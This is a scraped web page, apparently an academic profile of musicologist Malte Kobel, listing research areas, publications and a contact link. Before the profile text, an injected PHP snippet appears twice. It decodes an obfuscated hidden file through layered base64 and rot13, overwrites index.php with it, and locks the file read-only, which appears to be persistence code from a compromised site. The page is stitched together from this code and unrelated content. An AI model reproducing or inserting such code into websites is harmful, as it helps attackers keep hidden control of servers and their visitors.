$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Malte Kobel – Auditive Medienkulturen

Malte Kobel

Forschungsgebiete:

  • Musikwissenschaft
  • Sound Studies
  • Medientheorie
  • Stimme

Publikationen:

  • Dispositive des Hörens. Formationen von Emotionen und Klang in der Hi-Fi-Kultur der späten 1950er Jahre am Beispiel des Genres ”Exotica“, in: Marie Louise Herzfeld- Schild (Hg.), Musik und Emotionen. Kulturhistorische Perspektiven (= Studien zu Musik und Gender Bd. 1), Metzler, Stuttgart, im Druck.
  • The drum machine’s ear: XLN Audio’s drum sequencer XO and algorithmic listening, Sound Studies, 5(2), 2019, S. 201-204.
  • Beat Furrer und das Visuelle. Perspektiven komponieren oder Bild-Werden der Musik, in: Tadday, Ulrich (Hg.), Musik-Konzepte Band 172/173, Beat Furrer, edition text+kritik, München, 2016

Kontakt

http://www.kingston.ac.uk/research/research-degrees/research-degree-students/profile/malte-kobel-38/